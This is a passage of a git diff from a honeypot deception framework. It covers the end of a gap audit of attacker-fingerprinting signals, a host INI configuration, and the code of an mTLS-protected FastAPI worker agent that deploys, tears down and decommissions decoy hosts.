| Signal | Status | Where Captured | What's Missing | Cheap Fix | Priority |
|
||||
|--------|--------|-----------------|-----------------|-----------|----------|
|
||||
| **Session Environment** |
|
||||
| TERM | partial | SSH pty-req, server-readable | No syslog emission, no DB | Patch SSH syslog bridge to emit term= | V2 |
|
||||
| LANG/LC_ALL | n/a | Server locale, not attacker-controlled | Not visible from server vantage | Defer (not capturable) | defer |
|
||||
| SSH client version | partial | TCP stream (plaintext identification banner sent before key exchange) | Sniffer doesn't parse SSH banners; only TLS fingerprints | Extend sniffer to extract SSH banner from TCP stream | v1 blocker |
|
||||
| Terminal size (COLS×ROWS) | not_captured | SSH pty-req extension | Requires protocol interception or sshd patch | Patch sshd to log pty-req | V2 |
|
||||
| **Keyboard/Human** |
|
||||
| Per-keystroke timing | partial | Asciinema "i" events with t timestamps | Files on disk, not ingested to DB | Implement SessionProfile table + ingest job | v1 blocker |
|
||||
| Control-character stream | partial | Asciinema keystroke bytes | Same as above (files only) | Same as above | v1 blocker |
|
||||
| Inter-command think time | not_captured | Requires prompt detection | Heuristic (line ending in $/#) not implemented | Post-hoc: regex + gap detection over asciinema | V2 |
|
||||
| Pause before sensitive cmd | not_captured | Would be in asciinema timing | Requires command-line parsing + gap detection | Off-line analysis of asciinema | V2 |
|
||||
| Command n-grams | partial | Attacker.commands (generic list) | Per-session structure missing | Parse asciinema I/O; store in SessionProfile | V2 |
|
||||
| Flag preferences | not_captured | Asciinema input has typed flags | No parsing or normalization | Regex-parse and canonicalize flags from asciinema | V2 |
|
||||
| Typo patterns | not_captured | Raw keystroke sequence in asciinema "i" | Requires keystroke-by-keystroke reconstruction | Parse "i" events with backspace markers; reconstruct line state | V2 |
|
||||
| Editor choice | partial | Attacker.commands shows editor launch | No aggregation or time-in-editor | Count editor invocations; store preference in SessionProfile | V2 |
|
||||
| Shell history usage | partial | Command input shows !, ^, !! | No parsing for history operators | Regex-scan for shell history syntax; count | V2 |
|
||||
| **SSH Transport** |
|
||||
| HASSH/HASSHServer | captured | Prober (hassh.py); Attacker.fingerprints | ✓ (hash + raw algorithm strings in syslog) | Already done | — |
|
||||
| KEX algorithm order | partial | Syslog event kex_algorithms= field | Not persisted to DB (only in syslog) | Add AttackerBehavior.kex_order_raw (MEDIUMTEXT, JSON) | v1 blocker |
|
||||
| Public key comment | not_captured | SSH wire format (auth_pubkey) | Requires server-side auth hook | Patch sshd to emit auth_pubkey_comment event | V2 |
|
||||
| Private key type | partial | SSH wire format (auth algorithm OID) | Encrypted after KEX; needs sshd hook | Patch sshd to emit auth_key_type event | V2 |
|
||||
| Agent forwarding? | not_captured | SSH extension negotiation (encrypted) | Requires sshd instrumentation | Patch sshd to detect ssh-agent@openssh.com | V2 |
|
||||
| Channel multiplexing | partial | SSH service logs commands separately | No channel state machine | Instrument sshd SSH_MSG_CHANNEL_OPEN events | V2 |
|
||||
| SSH_CLIENT env vars | captured | Server sets automatically; queryable via shell | No automatic logging | Patch sshd PAM to emit SSH_CLIENT on auth | V2 |
|
||||
| **Network/Transport** |
|
||||
| TCP timestamp skew | partial | PCAP + sniffer has has_timestamps flag | Only boolean; not timestamp values | Extract timestamp seq numbers in sniffer | V2 |
|
||||
| TCP ISN generator | not_captured | PCAP SYN seq field | No per-connection ISN logging | Log syn_seq in tcp_syn_fingerprint event | V2 |
|
||||
| TCP options ordering | partial | Sniffer extracts options_sig signature | Aggregated string; no raw order per-packet | Extend tcp_fingerprint JSON with raw options list | v1 improvement |
|
||||
| Initial congestion window | not_captured | Would require per-packet ACK analysis | Not tracked in sniffer | Extend tcp_flow_timing to include payload sizes list | V2 |
|
||||
| Retransmit timing+backoff | partial | Sniffer counts retransmits; no timing | RTO/backoff timing not logged | Extend event to include RTO deltas | V2 |
|
||||
| MTU/path-MTU discovery | partial | MSS in TCP SYN; byte counts per flow | No ICMP fragmentation-needed events | Add ICMP processing; correlate with TCP flows | V2 |
|
||||
| Packet pacing (μs) | not_captured | Sniffer uses millisecond granularity | Needs PCAP hardware timestamps or OS hooks | Upgrade to sub-millisecond timing | V2+ |
|
||||
| Window scaling | captured | TCP fingerprint; wscale in AttackerBehavior | ✓ queryable | — | — |
|
||||
| ECN negotiation | not_captured | TCP SYN flags (CWR/ECE) + options | Not extracted from TCP header | Extend TCP fingerprint to parse ECN bits | V2 |
|
||||
| **L7 (TLS/HTTP)** |
|
||||
| TLS fingerprint (JA3/JA4) | captured | Sniffer fingerprint.py; Attacker.fingerprints | ✓ hashes stored + syslog | Already done | — |
|
||||
| HTTP/2 SETTINGS order | not_captured | Encrypted inside TLS | Passive inspection not viable | Defer (not capturable) | defer |
|
||||
| HTTP/2 prioritization | not_captured | Encrypted | Not capturable | defer | defer |
|
||||
| HTTP header ordering | not_captured | Encrypted; requires service logging | Service doesn't log raw headers | Patch HTTP service to log header order | V2 |
|
||||
| Cookie handling | not_captured | Requires HTTP state machine | Not tracked | Add cookie jar logging to HTTP service | V2 |
|
||||
| **Aggregated/Derived** |
|
||||
| Time-of-day distribution | partial | Timestamps on all events | No aggregation table | Batch job: hour-of-day histogram → AttackerAggregate | V2 |
|
||||
| Session duration dist | partial | SessionProfile would have duration | No SessionProfile table yet | Implement SessionProfile + duration stats | V2 |
|
||||
| Recon-to-action ratio | partial | AttackerBehavior.phase_sequence | No per-attacker ratio column | Compute ratio in profiler; store in AttackerAggregate | V2 |
|
||||
| Lateral movement style | not_captured | Correlation engine has traversal path | No traversal pattern analysis | Extend engine to compute dwell time + fan-out metrics | V2 |
|
||||
| Persistence-first vs. exfil | not_captured | No persistence event taxonomy | Needs event-type classification | Add PERSISTENCE_EVENT_TYPES; compute timings | V2 |
|
||||
| Tool-chain ordering | partial | tool_guesses list exists; unordered | No temporal ordering | Sort by first-event timestamp; build transition graph | V2 |
|
||||
| Error-response psych | not_captured | No success/failure event tagging | Requires per-command outcome tracking | Extend service events with status=success/failure | V2 |
|
||||
|
||||
---
|
||||
|
||||
## Pre-v1 Capture Gaps (Actionable, Potentially Blocking)
|
||||
|
||||
**Only tackle these if the signal is committed to the v1 roadmap:**
|
||||
|
||||
1. **KEX algorithm ordering** (ssh-transport)
|
||||
- **Action**: Add `AttackerBehavior.kex_order_raw` (MEDIUMTEXT, JSON list of algorithm strings).
|
||||
- **Effort**: 2 hrs (schema + sniffer event parser + profiler aggregator).
|
||||
- **Blocker?**: Only if roadmap demands full KEX analysis (currently only HASSH hash is promised).
|
||||
|
||||
2. **Per-keystroke timing ingestion** (keyboard/human)
|
||||
- **Action**: Create `SessionProfile` table (design in DEVELOPMENT_V2.md); stub write path with all NULLs.
|
||||
- **Effort**: 4 hrs (schema + migration + DAL).
|
||||
- **Blocker?**: Yes, if keystroke dynamics is v1 roadmap. Data exists on disk but is not queryable.
|
||||
|
||||
3. **SSH client banner capture** (ssh-transport)
|
||||
- **Action**: Extend sniffer to parse SSH identification banners from the TCP stream (sent in plaintext before key exchange); emit ssh_client_hello event.
|
||||
- **Effort**: 3 hrs (TCP stream parser + sniffer integration).
|
||||
- **Blocker?**: Yes, if full SSH client profiling is v1 roadmap (currently only server banner via HASSH).
|
||||
|
||||
4. **TCP options raw extraction** (network/transport)
|
||||
- **Action**: Extend `tcp_fingerprint` JSON to include raw options list (not just signature string).
|
||||
- **Effort**: 1 hr (minimal schema change + sniffer parser).
|
||||
- **Blocker?**: No (options_sig is good enough for current p0f-style fingerprinting; nice-to-have).
|
||||
|
||||
---
|
||||
|
||||
## Non-Capturable Signals (Explicit Deferral)
|
||||
|
||||
These require vantage-point changes or are architecturally infeasible:
|
||||
|
||||
| Signal | Why | Vantage Point Needed |
|
||||
|--------|-----|----------------------|
|
||||
| LANG / LC_ALL | Server locale is fixed; attacker's client locale invisible over SSH | Client-side instrumentation |
|
||||
| HTTP/2 SETTINGS frame order | Encrypted inside TLS stream | Server-side decryption or key log |
|
||||
| HTTP/2 stream prioritization | Encrypted | Server-side decryption |
|
||||
| Initial congestion window (CWND) | Requires detailed TCP ACK-clock tracking | Per-packet sniffer instrumentation |
|
||||
| Packet pacing (μs resolution) | Requires hardware-timestamped PCAP or kernel hooks | OS-level instrumentation |
|
||||
| Hold time / pressure / velocity (typing biometrics) | Not on SSH wire | Client-side keystroke instrumentation |
|
||||
|
||||
---
|
||||
|
||||
## Summary for v1 Release
|
||||
|
||||
**Ship with these (already captured, queryable)**:
|
||||
- HASSH/HASSHServer ✓
|
||||
- JA3/JA3S/JA4/JA4S ✓
|
||||
- TLS session resumption ✓
|
||||
- TCP fingerprint (window, wscale, mss, options_sig) ✓
|
||||
- Behavioral timing stats (mean/median/stdev IAT) ✓
|
||||
- Phase sequencing (recon_end, exfil_start) ✓
|
||||
- Tool attribution (beacon timing + headers) ✓
|
||||
|
||||
**Data exists on disk, not queryable (v1 deferral acceptable)**:
|
||||
- Per-keystroke timing (asciinema day-shards) — needs SessionProfile ingestion job
|
||||
- SSH client banner (TCP stream) — needs sniffer enhancement
|
||||
- KEX algorithm order (syslog) — needs AttackerBehavior.kex_order_raw column
|
||||
|
||||
**Requires infrastructure changes (v2+)**:
|
||||
- Lateral movement graph analysis
|
||||
- HTTP header order + cookie jar behavior
|
||||
- Persistence-first vs. exfil-first classification
|
||||
- Error-response psychology
|
||||
- Chronotyping + session duration distribution
|
||||
|
||||
---
|
||||
|
||||
## Federation & Cross-Operator Gossip (v2 Implications)
|
||||
|
||||
The `SessionProfile` schema (table, schema_version field, numeric features) is designed to be the federation wire format. **No changes needed for v1**, but ensure schema_version is in the table definition from day one so gossip compatibility is straightforward in v2.
|
||||
|
||||
---
|
||||
|
||||
## Appendices
|
||||
|
||||
### A. Code Paths Audited
|
||||
|
||||
- `decnet/sniffer/fingerprint.py` — TLS + TCP fingerprinting engine
|
||||
- `decnet/services/ssh.py` — SSH service config + artifact paths
|
||||
- `decnet/prober/hassh.py` — HASSHServer computation
|
||||
- `decnet/web/db/models.py` — SQL schema (Attacker, AttackerBehavior, etc.)
|
||||
- `decnet/profiler/behavioral.py` — Timing + tool attribution
|
||||
- `decnet/correlation/parser.py` — RFC 5424 syslog ingestion
|
||||
- `decnet/templates/ssh/` — Session recording (asciinema), syslog bridge, capture.sh
|
||||
|
||||
### B. Storage Destinations Verified
|
||||
|
||||
- **Database**: SQLite/MySQL tables (Attacker, AttackerBehavior, Bounty, Log)
|
||||
- **Syslog**: RFC 5424 events (parsed by correlation engine, optionally piped to ELK)
|
||||
- **Disk**: Asciinema day-shards (`/var/lib/decnet/session_recordings/`), raw PCAP (retention TBD)
|
||||
- **Memory**: Sniffer state (sessions, flows, dedup cache) — lost on restart unless replayed from PCAP
|
||||
|
||||
### C. Roadmap Cross-Reference
|
||||
|
||||
- DEVELOPMENT.md lines 48–133: Attacker Intelligence Collection (TLS, behavioral, protocol fingerprinting, network topology, geolocation, service-level, aggregated).
|
||||
- `[x]` JA3/JA3S, JA4+, JARM, session resumption, TCP window/scaling, retransmits, beaconing, data exfil timing, HASSH/HASSHServer, HTTP/2 fingerprint, TLS session resumption, TTL values (partial), TCP stack fingerprinting.
|
||||
- `[ ]` (not v1): ISN patterns, HTTP header ordering, QUIC, DNS, IPv6/mDNS leakage, geolocation, service-level commands, credential reuse, payload signatures.
|
||||
|
||||
- DEVELOPMENT_V2.md: Keystroke dynamics, session profiling, federation.
|
||||
- SessionProfile schema (lines 71–104) — not yet implemented; ready-to-implement design.
|
||||
- Correlation via simhash (lines 50–56) — digraph rhythm fingerprinting.
|
||||
|
||||
---
|
||||
|
||||
1000
api-audit.md
1000
api-audit.md
File diff suppressed because it is too large
Load Diff
@@ -1,64 +0,0 @@
|
||||
; /etc/decnet/decnet.ini — DECNET host configuration
|
||||
;
|
||||
; Copy to /etc/decnet/decnet.ini and edit. Values here seed os.environ at
|
||||
; CLI startup via setdefault() — real env vars still win, so you can
|
||||
; override any value on the shell without editing this file.
|
||||
;
|
||||
; A missing file is fine; every daemon has sensible defaults. The main
|
||||
; reason to use this file is to skip typing the same flags on every
|
||||
; `decnet` invocation and to pin a host's role via `mode`.
|
||||
|
||||
[decnet]
|
||||
; mode = agent | master
|
||||
; agent — worker host (runs `decnet agent`, `decnet forwarder`, `decnet updater`).
|
||||
; Master-only commands (api, swarmctl, swarm, deploy, teardown, ...)
|
||||
; are hidden from `decnet --help` and refuse to run.
|
||||
; master — central server (runs `decnet api`, `decnet web`, `decnet swarmctl`,
|
||||
; `decnet listener`). All commands visible.
|
||||
mode = agent
|
||||
|
||||
; disallow-master = true (default when mode=agent)
|
||||
; Set to false for hybrid dev hosts that legitimately run both roles.
|
||||
disallow-master = true
|
||||
|
||||
; log-directory — root for DECNET's per-component logs. Systemd units set
|
||||
; DECNET_SYSTEM_LOGS=<log-directory>/decnet.<component>.log so agent, forwarder,
|
||||
; and engine each get their own file. The forwarder tails decnet.log.
|
||||
log-directory = /var/log/decnet
|
||||
|
||||
|
||||
; ─── Agent-only settings (read when mode=agent) ───────────────────────────
|
||||
[agent]
|
||||
; Where the master's syslog-TLS listener lives. DECNET_SWARM_MASTER_HOST.
|
||||
master-host = 192.168.1.50
|
||||
; Master listener port (RFC 5425 default 6514). DECNET_SWARM_SYSLOG_PORT.
|
||||
swarm-syslog-port = 6514
|
||||
; Bind address/port for this worker's agent API (mTLS).
|
||||
agent-port = 8765
|
||||
; Cert bundle dir — must contain ca.crt, worker.crt, worker.key from enroll.
|
||||
; DECNET_AGENT_DIR — honored by the forwarder child as well.
|
||||
agent-dir = /home/anti/.decnet/agent
|
||||
; Updater cert bundle (required for `decnet updater`).
|
||||
updater-dir = /home/anti/.decnet/updater
|
||||
|
||||
|
||||
; ─── Master-only settings (read when mode=master) ─────────────────────────
|
||||
[master]
|
||||
; Main API (REST for the React dashboard). DECNET_API_HOST / _PORT.
|
||||
api-host = 0.0.0.0
|
||||
api-port = 8000
|
||||
; React dev-server dashboard (`decnet web`). DECNET_WEB_HOST / _PORT.
|
||||
web-host = 0.0.0.0
|
||||
web-port = 8080
|
||||
; Swarm controller (master-internal). DECNET_SWARMCTL_HOST isn't exposed
|
||||
; under that name today — this block is the forward-compatible spelling.
|
||||
; swarmctl-host = 127.0.0.1
|
||||
; swarmctl-port = 8770
|
||||
; Syslog-over-TLS listener bind address and port. DECNET_LISTENER_HOST and
|
||||
; DECNET_SWARM_SYSLOG_PORT. The listener is auto-spawned by `decnet swarmctl`.
|
||||
listener-host = 0.0.0.0
|
||||
swarm-syslog-port = 6514
|
||||
; Master CA dir (for enroll / swarm cert issuance).
|
||||
; ca-dir = /home/anti/.decnet/ca
|
||||
; JWT secret for the web API. MUST be set; 32+ bytes. Keep out of git.
|
||||
; jwt-secret = REPLACE_ME_WITH_A_32_BYTE_SECRET
|
||||
@@ -1,12 +0,0 @@
|
||||
"""DECNET — honeypot deception-network framework.
|
||||
|
||||
This __init__ runs once, on the first `import decnet.*`. It seeds
|
||||
os.environ from /etc/decnet/decnet.ini (if present) so that later
|
||||
module-level reads in decnet.env pick up the INI values as if they had
|
||||
been exported by the shell. Real env vars always win via setdefault().
|
||||
|
||||
Kept minimal on purpose — any heavier work belongs in a submodule.
|
||||
"""
|
||||
from decnet.config_ini import load_ini_config as _load_ini_config
|
||||
|
||||
# Import-time side effect: seed os.environ from the INI file, as described in
# the module docstring above.
_load_ini_config()
|
||||
|
||||
@@ -1,7 +0,0 @@
|
||||
"""DECNET worker agent — runs on every SWARM worker host.
|
||||
|
||||
Exposes an mTLS-protected FastAPI service the master's SWARM controller
|
||||
calls to deploy, mutate, and tear down deckies locally. The agent reuses
|
||||
the existing `decnet.engine.deployer` code path unchanged, so a worker runs
|
||||
deckies the same way `decnet deploy --mode unihost` does today.
|
||||
"""
|
||||
@@ -1,320 +0,0 @@
|
||||
"""Worker-side FastAPI app.
|
||||
|
||||
Protected by mTLS at the ASGI/uvicorn transport layer: uvicorn is started
|
||||
with ``--ssl-ca-certs`` + ``--ssl-cert-reqs 2`` (CERT_REQUIRED), so any
|
||||
client that cannot prove a cert signed by the DECNET CA is rejected before
|
||||
reaching a handler. Once past the TLS handshake, all peers are trusted
|
||||
equally (the only entity holding a CA-signed cert is the master
|
||||
controller).
|
||||
|
||||
Endpoints mirror the existing unihost CLI verbs:
|
||||
|
||||
* ``POST /deploy`` — body: serialized ``DecnetConfig``
|
||||
* ``POST /teardown`` — body: optional ``{"decky_id": "..."}``
|
||||
* ``POST /mutate`` — body: ``{"decky_id": "...", "services": [...]}``
|
||||
* ``GET /status`` — deployment snapshot
|
||||
* ``GET  /health``   — liveness probe; mTLS is still required (the
|
||||
master pings it with its cert).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import pathlib
|
||||
from contextlib import asynccontextmanager
|
||||
from typing import Any, Optional
|
||||
|
||||
from fastapi import FastAPI, HTTPException
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
import contextlib
|
||||
|
||||
from decnet.agent import executor as _exec
|
||||
from decnet.agent import heartbeat as _heartbeat
|
||||
from decnet.agent import topology_ops as _topology_ops
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import run_health_heartbeat
|
||||
from decnet.swarm.pki import DEFAULT_AGENT_DIR
|
||||
from decnet.agent.topology_store import AlreadyApplied, TopologyStore
|
||||
from decnet.config import DecnetConfig
|
||||
from decnet.logging import get_logger
|
||||
from decnet.topology.validate import ValidationError
|
||||
|
||||
log = get_logger("agent.app")
|
||||
|
||||
|
||||
def _resolve_agent_dir() -> pathlib.Path:
    """Pick the directory that holds this worker's agent state.

    Resolution order:

    1. ``DECNET_AGENT_DIR`` from the environment, when set to a non-empty value.
    2. ``/etc/decnet/agent``, when that path exists on this host.
    3. ``DEFAULT_AGENT_DIR`` as the fallback.
    """
    override = os.environ.get("DECNET_AGENT_DIR")
    if override:
        return pathlib.Path(override)

    system_dir = pathlib.Path("/etc/decnet/agent")
    return system_dir if system_dir.exists() else DEFAULT_AGENT_DIR
|
||||
|
||||
|
||||
# Module-level singleton. Created lazily on first use so tests can
|
||||
# monkeypatch DECNET_AGENT_DIR before the store binds to a path.
|
||||
_topology_store: Optional[TopologyStore] = None
|
||||
|
||||
|
||||
def _store() -> TopologyStore:
    """Return the shared ``TopologyStore``, creating it on first call.

    The store is constructed with the path ``topology.db`` inside the
    directory chosen by ``_resolve_agent_dir()`` and cached in the
    module-level ``_topology_store`` so later calls reuse the same instance.
    """
    global _topology_store
    if _topology_store is not None:
        return _topology_store

    db_path = _resolve_agent_dir() / "topology.db"
    _topology_store = TopologyStore(db_path)
    return _topology_store
|
||||
|
||||
|
||||
# Handle to the background log-collector task. Stays None until
# _ensure_collector_started() creates it; _lifespan cancels it on shutdown.
_collector_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
def _ensure_collector_started() -> None:
    """Start the agent's log collector task unless one is already running.

    Invoked on demand from /topology/apply after a successful materialise.
    It must NOT be started from the lifespan hook: the agent's boot
    invariant is "never touch docker until master tells us to" (see
    tests/swarm/test_agent_no_auto_restore.py).

    The collector watches ``decnet.topology.service=true`` labels via
    docker events and writes RFC 5424 lines to ``DECNET_AGENT_LOG_FILE``,
    which the forwarder ships to the master over syslog-TLS. The call is
    idempotent: while a previously created task has not finished, it
    returns without doing anything. If the collector worker cannot be
    imported, a warning is logged and no task is created.
    """
    global _collector_task
    still_running = _collector_task is not None and not _collector_task.done()
    if still_running:
        return

    from decnet.env import DECNET_AGENT_LOG_FILE

    try:
        from decnet.collector.worker import log_collector_worker
    except Exception:  # noqa: BLE001 — docker may be unavailable on dev
        log.warning(
            "agent log collector not starting — collector worker import failed",
            exc_info=True,
        )
        return

    worker = log_collector_worker(DECNET_AGENT_LOG_FILE)
    _collector_task = asyncio.create_task(worker, name="agent-log-collector")
    log.info("agent log collector started log_file=%s", DECNET_AGENT_LOG_FILE)
|
||||
|
||||
|
||||
# Handle to the host-local bus health-heartbeat task. Created by _lifespan at
# startup and cancelled/reset to None by _lifespan at shutdown.
_bus_heartbeat_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
@asynccontextmanager
async def _lifespan(app: FastAPI):
    """Run startup work before the app serves requests and undo it afterwards.

    Startup starts the master-facing heartbeat and spawns the host-local bus
    health-heartbeat task. The log collector is not started here; it is only
    cancelled on shutdown if something else started it in the meantime.
    Shutdown stops the heartbeat, cancels the background tasks, closes the
    bus (when one was connected) and closes the topology store (when one was
    opened).
    """
    global _bus_heartbeat_task, _collector_task, _topology_store

    # Best-effort: if identity/bundle plumbing isn't configured (e.g. dev
    # runs or non-enrolled hosts), heartbeat.start() is a silent no-op.
    _heartbeat.start()

    # Host-local bus heartbeat (system.agent.health). Separate channel
    # from the mTLS master-facing heartbeat above; this one lets peers on
    # the same host (dashboard, updater) see the agent is alive without
    # hitting its HTTPS endpoint. Bus-disabled path is a no-op loop.
    try:
        connected_bus = get_bus(client_name="agent")
        await connected_bus.connect()
    except Exception as exc:  # noqa: BLE001
        log.warning("agent: bus unavailable, skipping health heartbeat: %s", exc)
        bus = None
    else:
        bus = connected_bus

    _bus_heartbeat_task = asyncio.create_task(
        run_health_heartbeat(bus, "agent"),
        name="agent-bus-heartbeat",
    )

    try:
        yield
    finally:
        await _heartbeat.stop()

        if _bus_heartbeat_task is not None:
            _bus_heartbeat_task.cancel()
            # Cancellation (or any error the task raised) is expected here.
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await _bus_heartbeat_task
            _bus_heartbeat_task = None

        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()

        if _collector_task is not None and not _collector_task.done():
            _collector_task.cancel()
            with contextlib.suppress(asyncio.CancelledError, Exception):  # noqa: BLE001
                await _collector_task
            _collector_task = None

        if _topology_store is not None:
            _topology_store.close()
            _topology_store = None
|
||||
|
||||
|
||||
# The worker's ASGI application. All schema/documentation endpoints are turned
# off, startup/shutdown is handled by _lifespan, and the 400/500 entries are
# default response descriptions shared by every route.
app = FastAPI(
    title="DECNET SWARM Agent",
    version="0.1.0",
    docs_url=None,  # no interactive docs on worker — narrow attack surface
    redoc_url=None,
    openapi_url=None,
    lifespan=_lifespan,
    responses={
        400: {"description": "Malformed request body"},
        500: {"description": "Executor error"},
    },
)
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ schemas
|
||||
|
||||
class DeployRequest(BaseModel):
    """Request body for ``POST /deploy``."""

    # Configuration the deploy handler hands to the executor.
    config: DecnetConfig = Field(..., description="Full DecnetConfig to materialise on this worker")
    # Forwarded unchanged to the executor's deploy call as ``dry_run``.
    dry_run: bool = False
    # Forwarded unchanged to the executor's deploy call as ``no_cache``.
    no_cache: bool = False
|
||||
|
||||
|
||||
class TeardownRequest(BaseModel):
    """Request body for ``POST /teardown``."""

    # Passed straight to the executor's teardown call; may be omitted.
    # NOTE(review): presumably ``None`` means "tear down everything on this
    # worker" — confirm against the executor.
    decky_id: Optional[str] = None
|
||||
|
||||
|
||||
class MutateRequest(BaseModel):
    """Request body for ``POST /mutate``: a decky id plus a list of services."""

    # Identifier of the decky the request applies to.
    decky_id: str
    # Service names for that decky.
    # NOTE(review): presumably the full replacement set rather than a delta —
    # confirm against the mutate handler.
    services: list[str]
|
||||
|
||||
|
||||
# ------------------------------------------------------------------ routes
|
||||
|
||||
@app.get("/health")
async def health() -> dict[str, str]:
    """Liveness probe: always answers with a fixed ``{"status": "ok"}`` body."""
    payload: dict[str, str] = {"status": "ok"}
    return payload
|
||||
|
||||
|
||||
@app.get("/status")
async def status() -> dict:
    """Return whatever the executor reports as the current deployment status."""
    snapshot = await _exec.status()
    return snapshot
|
||||
|
||||
|
||||
@app.post(
    "/deploy",
    responses={500: {"description": "Deployer raised an exception materialising the config"}},
)
async def deploy(req: DeployRequest) -> dict:
    """Hand the requested config to the executor and report the decky count.

    Raises:
        HTTPException: status 500 carrying ``str(exc)`` as the detail when
            the executor raises; the original exception is logged and
            chained as the cause.
    """
    try:
        await _exec.deploy(req.config, dry_run=req.dry_run, no_cache=req.no_cache)
    except Exception as err:
        log.exception("agent.deploy failed")
        raise HTTPException(status_code=500, detail=str(err)) from err

    decky_count = len(req.config.deckies)
    return {"status": "deployed", "deckies": decky_count}
|
||||
|
||||
|
||||
@app.post(
    "/teardown",
    responses={500: {"description": "Teardown raised an exception"}},
)
async def teardown(req: TeardownRequest) -> dict:
    """Tear down via the executor, echoing the requested ``decky_id`` back.

    Executor failures are logged and reported as HTTP 500 with the exception
    text as detail.
    """
    target = req.decky_id
    try:
        await _exec.teardown(target)
    except Exception as exc:
        log.exception("agent.teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    else:
        return {"status": "torn_down", "decky_id": target}
|
||||
|
||||
|
||||
@app.post(
    "/self-destruct",
    responses={500: {"description": "Reaper could not be scheduled"}},
)
async def self_destruct() -> dict:
    """Stop all DECNET services on this worker and delete the install
    footprint. Called by the master during decommission. Logs under
    /var/log/decnet* are preserved.

    Fire-and-forget: the executor only schedules the reaper, so this handler
    replies before any files are deleted. The route sets no explicit status
    code, so a successful reply uses the framework default. Executor failures
    are logged and surfaced as HTTP 500.
    """
    try:
        await _exec.self_destruct()
    except Exception as exc:
        log.exception("agent.self_destruct failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    else:
        return {"status": "self_destruct_scheduled"}
|
||||
|
||||
|
||||
# ------------------------------------------------------- topology endpoints
|
||||
|
||||
|
||||
class ApplyTopologyRequest(BaseModel):
    """Body of ``POST /topology/apply``; both fields are required."""

    # Topology payload, passed as-is to ``_topology_ops.apply``.
    hydrated: dict[str, Any] = Field(
        ...,
        description="Hydrated topology dict from master.persistence.hydrate()",
    )
    # Hash the master computed over ``hydrated``; echoed back on success.
    version_hash: str = Field(
        ...,
        description="Master's canonical_hash(hydrated); must match ours",
    )
|
||||
|
||||
|
||||
class TeardownTopologyRequest(BaseModel):
    """Body of ``POST /topology/teardown``."""

    # Required identifier, forwarded to ``_topology_ops.teardown``.
    topology_id: str = Field(..., description="Topology UUID to dismantle")
|
||||
|
||||
|
||||
@app.post(
    "/topology/apply",
    responses={
        400: {"description": "Malformed hydrated topology or hash mismatch"},
        409: {"description": "A different topology is already applied"},
        500: {"description": "Docker or compose raised while applying"},
    },
)
async def topology_apply(req: ApplyTopologyRequest) -> dict:
    """Apply the hydrated topology and start the collector on success.

    Error mapping:
        * ``HashMismatch`` / ``ValidationError`` -> 400
        * ``AlreadyApplied`` -> 409
        * anything else -> 500, after a best-effort attempt to record the
          error text against the topology id in the local store.

    Returns:
        ``{"status": "applied", "version_hash": <request hash>}``.
    """
    store = _store()
    try:
        await _topology_ops.apply(req.hydrated, req.version_hash, store)
    except (_topology_ops.HashMismatch, ValidationError) as exc:
        raise HTTPException(status_code=400, detail=str(exc)) from exc
    except AlreadyApplied as exc:
        raise HTTPException(status_code=409, detail=str(exc)) from exc
    except Exception as exc:
        log.exception("agent.topology_apply failed")
        # The id lookup lives inside the guard as well: a payload whose
        # "topology" entry is not a mapping would otherwise raise here and
        # replace the real failure with an unrelated AttributeError.
        try:
            topology_id = (req.hydrated.get("topology") or {}).get("id")
            if topology_id:
                store.record_error(
                    str(topology_id), str(exc)[:500], hydrated=req.hydrated,
                )
        except Exception:  # noqa: BLE001 — don't mask original failure
            log.exception("failed to record apply error")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    _ensure_collector_started()
    return {"status": "applied", "version_hash": req.version_hash}
|
||||
|
||||
|
||||
@app.post(
    "/topology/teardown",
    responses={500: {"description": "Docker or compose raised while tearing down"}},
)
async def topology_teardown(req: TeardownTopologyRequest) -> dict:
    """Dismantle the named topology, echoing its id back on success.

    Any exception from the teardown is logged and reported as HTTP 500 with
    the exception text as detail.
    """
    topology_id = req.topology_id
    try:
        await _topology_ops.teardown(topology_id, _store())
    except Exception as exc:
        log.exception("agent.topology_teardown failed")
        raise HTTPException(status_code=500, detail=str(exc)) from exc
    else:
        return {"status": "torn_down", "topology_id": topology_id}
|
||||
|
||||
|
||||
@app.get("/topology/state")
async def topology_state() -> dict:
    """Return the topology state computed from the local store."""
    store = _store()
    return _topology_ops.state(store)
|
||||
|
||||
|
||||
@app.post(
    "/mutate",
    responses={501: {"description": "Worker-side mutate not yet implemented"}},
)
async def mutate(req: MutateRequest) -> dict:
    """Placeholder route: always raises HTTP 501 and never reads *req*."""
    # TODO: implement worker-side mutate. Currently the master performs
    # mutation by re-sending a full /deploy with the updated DecnetConfig;
    # this avoids duplicating mutation logic on the worker for v1. When
    # ready, replace the 501 with a real redeploy-of-a-single-decky path.
    not_implemented = HTTPException(
        status_code=501,
        detail="Per-decky mutate is performed via /deploy with updated services",
    )
    raise not_implemented
|
||||
@@ -1,223 +0,0 @@
|
||||
"""Thin adapter between the agent's HTTP endpoints and the existing
|
||||
``decnet.engine.deployer`` code path.
|
||||
|
||||
Kept deliberately small: the agent does not re-implement deployment logic,
|
||||
it only translates a master RPC into the same function calls the unihost
|
||||
CLI already uses. Everything runs in a worker thread (the deployer is
|
||||
blocking) so the FastAPI event loop stays responsive.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from ipaddress import IPv4Network
|
||||
from typing import Any
|
||||
|
||||
from decnet.engine import deployer as _deployer
|
||||
from decnet.config import DecnetConfig, load_state, clear_state
|
||||
from decnet.logging import get_logger
|
||||
from decnet.network import (
|
||||
allocate_ips,
|
||||
detect_interface,
|
||||
detect_subnet,
|
||||
get_host_ip,
|
||||
)
|
||||
|
||||
log = get_logger("agent.executor")
|
||||
|
||||
|
||||
def _relocalize(config: DecnetConfig) -> DecnetConfig:
    """Rewrite a master-built config to the worker's local network reality.

    The master populates ``interface``/``subnet``/``gateway`` from its own
    box before dispatching, which blows up the deployer on any worker whose
